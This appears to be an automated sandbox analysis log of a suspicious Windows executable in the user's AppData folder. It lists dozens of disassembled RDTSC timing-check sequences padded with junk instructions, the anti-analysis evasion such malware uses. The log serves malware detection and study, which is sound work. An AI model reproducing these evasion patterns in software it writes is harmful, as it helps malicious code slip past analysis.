Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5695F3 second address: 56960D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBC91259405h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 56A692 second address: 56A6B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push edi 0x0000000a pop edi 0x0000000b jmp 00007FBC9118B8AAh 0x00000010 popad 0x00000011 js 00007FBC9118B8ACh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 56A6B0 second address: 56A74F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 mov edi, dword ptr [ebp+122D3A4Ch] 0x0000000c push dword ptr fs:[00000000h] 0x00000013 push 00000000h 0x00000015 push esi 0x00000016 call 00007FBC912593F8h 0x0000001b pop esi 0x0000001c mov dword ptr [esp+04h], esi 0x00000020 add dword ptr [esp+04h], 00000019h 0x00000028 inc esi 0x00000029 push esi 0x0000002a ret 0x0000002b pop esi 0x0000002c ret 0x0000002d jmp 00007FBC91259406h 0x00000032 mov dword ptr fs:[00000000h], esp 0x00000039 push 00000000h 0x0000003b push ebx 0x0000003c call 00007FBC912593F8h 0x00000041 pop ebx 0x00000042 mov dword ptr [esp+04h], ebx 0x00000046 add dword ptr [esp+04h], 00000017h 0x0000004e inc ebx 0x0000004f push ebx 0x00000050 ret 0x00000051 pop ebx 0x00000052 ret 0x00000053 mov edi, 11109CBEh 0x00000058 mov eax, dword ptr [ebp+122D07DDh] 0x0000005e movzx ebx, dx 0x00000061 or dword ptr [ebp+122D26CFh], edi 0x00000067 push FFFFFFFFh 0x00000069 xor dword ptr [ebp+1244A7D8h], esi 0x0000006f or edi, dword ptr [ebp+122D37C4h] 0x00000075 nop 0x00000076 push eax 0x00000077 push edx 0x00000078 pushad 0x00000079 jng 00007FBC912593F6h 0x0000007f pushad 0x00000080 popad 0x00000081 popad 0x00000082 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 56A74F second address: 56A76D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC9118B8B4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 56A76D second address: 56A774 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 56B6E7 second address: 56B6EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 57098E second address: 570996 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 56EA50 second address: 56EA54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 56EB0F second address: 56EB33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 jnp 00007FBC91259417h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FBC91259405h 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 56EB33 second address: 56EB37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 570B87 second address: 570B8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 570B8B second address: 570B9E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC9118B8ACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 570C70 second address: 570C7A instructions: 0x00000000 rdtsc 0x00000002 jl 00007FBC912593FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 573AD0 second address: 573AD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 573AD4 second address: 573ADA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 572DE4 second address: 572DEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 574988 second address: 57498E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 575873 second address: 57588B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FBC9118B8ADh 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 57588B second address: 575895 instructions: 0x00000000 rdtsc 0x00000002 je 00007FBC912593FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 57681B second address: 576846 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC9118B8B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FBC9118B8ADh 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 576846 second address: 576850 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FBC912593F6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5769B1 second address: 5769BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FBC9118B8A6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5769BB second address: 5769C8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 57F2AA second address: 57F2B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FBC9118B8A6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 57F69D second address: 57F6A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FBC912593F6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 57F6A7 second address: 57F6C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC9118B8B2h 0x00000007 jp 00007FBC9118B8A6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 57F6C7 second address: 57F6CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 57F6CD second address: 57F6D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 57F6D1 second address: 57F6DE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 57F6DE second address: 57F712 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a jmp 00007FBC9118B8B8h 0x0000000f push eax 0x00000010 pop eax 0x00000011 jmp 00007FBC9118B8AEh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 57F712 second address: 57F717 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 585CFD second address: 585D01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 585D01 second address: 585D05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 585DC8 second address: 585E06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c pushad 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 pop edx 0x00000011 jne 00007FBC9118B8A8h 0x00000017 popad 0x00000018 mov eax, dword ptr [eax] 0x0000001a jmp 00007FBC9118B8ABh 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FBC9118B8B1h 0x0000002a rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 585F2A second address: 585F2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 585F2F second address: 585F35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 585F35 second address: 585F39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 585F39 second address: 585F59 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FBC9118B8A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FBC9118B8B0h 0x00000015 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 585F59 second address: 585F7D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007FBC912593FDh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jl 00007FBC912593F6h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 585F7D second address: 585F82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5887FA second address: 5887FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 58D4CB second address: 58D4D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 58D4D1 second address: 58D4DE instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FBC912593F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 58C14F second address: 58C15B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FBC9118B8A6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 58C15B second address: 58C160 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 58C160 second address: 58C181 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FBC9118B8B7h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d push edx 0x0000000e pop edx 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 58C181 second address: 58C188 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 58C87A second address: 58C880 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 58C880 second address: 58C890 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FBC912593FBh 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 58C890 second address: 58C896 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 58C896 second address: 58C89A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 58C89A second address: 58C8A4 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FBC9118B8A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 58C8A4 second address: 58C8AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 58C9F8 second address: 58C9FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 58C9FC second address: 58CA0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FBC912593FCh 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 58CFD0 second address: 58CFED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBC9118B8B4h 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 58CFED second address: 58CFF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 58CFF3 second address: 58D047 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBC9118B8B7h 0x00000009 popad 0x0000000a jmp 00007FBC9118B8B0h 0x0000000f popad 0x00000010 js 00007FBC9118B8CCh 0x00000016 je 00007FBC9118B8BAh 0x0000001c pushad 0x0000001d pushad 0x0000001e popad 0x0000001f pushad 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 58D19B second address: 58D1A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 58D1A1 second address: 58D1AE instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FBC9118B8A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 58D300 second address: 58D306 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 58D306 second address: 58D30C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 58D30C second address: 58D35C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FBC912593FCh 0x00000008 jmp 00007FBC91259403h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jnp 00007FBC91259422h 0x00000015 pushad 0x00000016 jmp 00007FBC91259408h 0x0000001b js 00007FBC912593F6h 0x00000021 pushad 0x00000022 popad 0x00000023 popad 0x00000024 pushad 0x00000025 push eax 0x00000026 pop eax 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5915CE second address: 5915D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5920E9 second address: 5920F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5920F5 second address: 5920F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5920F9 second address: 59212C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC91259403h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 jmp 00007FBC91259405h 0x00000015 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 59212C second address: 592138 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jnp 00007FBC9118B8A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 592138 second address: 59214A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBC912593FEh 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 592567 second address: 59256B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 523A0A second address: 523A0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 523A0E second address: 523A18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 59998F second address: 5999A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FBC912593F6h 0x0000000a pop ecx 0x0000000b jmp 00007FBC912593FEh 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5999A8 second address: 5999B3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jc 00007FBC9118B8A6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 59AF3B second address: 59AF59 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC91259405h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 59AF59 second address: 59AF6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jng 00007FBC9118B8AAh 0x0000000e push edx 0x0000000f pop edx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 59AF6F second address: 59AF75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 59FE49 second address: 59FE51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 59FE51 second address: 59FE56 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 59FF97 second address: 59FF9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5A0105 second address: 5A012F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC912593FEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FBC91259406h 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5A0439 second address: 5A043D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5A043D second address: 5A0443 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5A0443 second address: 5A044F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5A0599 second address: 5A059D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5A0A64 second address: 5A0A7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBC9118B8B6h 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5A0A7E second address: 5A0A84 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5A0BC7 second address: 5A0BE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 jmp 00007FBC9118B8B5h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5A0BE3 second address: 5A0BF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007FBC912593F6h 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5A2820 second address: 5A282D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
